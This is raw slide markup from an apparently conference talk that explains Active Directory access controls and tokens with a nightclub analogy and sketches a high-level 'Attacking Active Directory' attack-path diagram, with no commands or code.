              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDC034F-6DA9-4D71-A573-A6B0019FD618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5824025" y="816013"/>
            <a:ext cx="6331138" cy="5762164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Left 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFA6F490-CF3D-4846-81B6-AF9507D3D903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8557011" y="3094893"/>
            <a:ext cx="1086391" cy="173608"/>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Left 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1184BD9D-66BE-4EBB-A5CE-E50B23393015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8557011" y="3255392"/>
            <a:ext cx="1086391" cy="173608"/>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row: Left 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81EA8821-8D49-4F2D-9C82-F9C6C0249203}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8557010" y="3445145"/>
            <a:ext cx="1086391" cy="173608"/>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Arrow: Left 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8F550EE-8C8A-4E45-8029-2C0835FB9987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8557010" y="3634898"/>
            <a:ext cx="1086391" cy="173608"/>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E6671BD0-B60A-483A-A293-52BCF8821EEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10035706" y="95157"/>
            <a:ext cx="2073436" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defconparties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95615667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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLUB AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC40EA16-BC5E-4C88-9029-73DB053D125D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209855" y="1220340"/>
            <a:ext cx="5790016" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ACL - bouncer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>DACL - clipboard with names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SACL - VIP’s list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ACEs - the names on the list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impersonation tokens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>- stamp into the club</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDC034F-6DA9-4D71-A573-A6B0019FD618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860862" y="830080"/>
            <a:ext cx="6331138" cy="5762164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arrow: Right 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C356B1EE-691E-4977-BEA7-D034CE85EAC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20291023">
            <a:off x="8028349" y="4528059"/>
            <a:ext cx="2813539" cy="7622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Impersonation Token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B1D305-67B5-4480-91D1-23F69218C518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10035706" y="95157"/>
            <a:ext cx="2073436" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defconparties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109038344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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLUB AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC40EA16-BC5E-4C88-9029-73DB053D125D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209855" y="1220340"/>
            <a:ext cx="5790016" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ACL - bouncer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>DACL - clipboard with names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SACL - VIP’s list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ACEs - the names on the list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Impersonation tokens - stamp into the club</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Delegation tokens </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>- wristband can get you into different clubs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDC034F-6DA9-4D71-A573-A6B0019FD618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5824025" y="816013"/>
            <a:ext cx="6331138" cy="5762164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Right 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F20717B-27E2-4983-8C4B-93E67C96C4CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7146388" y="5073962"/>
            <a:ext cx="2518117" cy="6471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Delegation Token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD89F8A4-930A-46CB-B918-C404C0F2C01B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10035706" y="95157"/>
            <a:ext cx="2073436" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defconparties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317566904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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D13BD8A6-D9B5-4521-964F-E1E3D43AE1FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1456942" y="1858583"/>
            <a:ext cx="9404723" cy="3140833"/>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8800" dirty="0"/>
              <a:t>Network Enumeration  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100638554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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Attack Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Oval 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A464831-E962-428C-ABBA-BD95549122D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633191" y="1136453"/>
            <a:ext cx="949910" cy="8433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Bob</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Oval 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{592BCA9D-16F0-45B2-9F7F-757CDBC8CC9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918682" y="4438951"/>
            <a:ext cx="949910" cy="8433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Joe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Oval 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0CCE8F3-A266-4C87-A784-0840E5576488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937536" y="1807626"/>
            <a:ext cx="1365681" cy="8433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Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Oval 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53192FB8-D90F-44D5-BF2C-2B9D5090091D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10182981" y="4827560"/>
            <a:ext cx="1427824" cy="843378"/>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DA Steve</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{992618C5-B3C4-476A-B477-69D902FEDF8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244968" y="2816162"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Graphic 24" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B323E4BF-E29D-499D-B917-B2885056FDF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962099" y="1807626"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA5126E-9CE8-4035-8011-4A52E66E076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085289" y="4786210"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Graphic 26" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A60074-A66E-4DD4-878F-A5EC88EA1E4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276347" y="5255944"/>
            <a:ext cx="747287" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Star: 7 Points 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB0D2ACD-C48C-44C2-86AB-3877577A44C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7600435" y="2794280"/>
            <a:ext cx="1987861" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="star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t>SqlAdmins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Oval 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB3F2409-76C9-4308-835C-ED291082A032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746761" y="3211980"/>
            <a:ext cx="1153399" cy="8433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John</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B704972E-E133-41D9-8B3A-F6AE024B9399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="6"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="1558142"/>
            <a:ext cx="1378998" cy="6231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94A3E066-4910-4F96-BEA7-BDC498C7EFA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="4"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1108146" y="1979831"/>
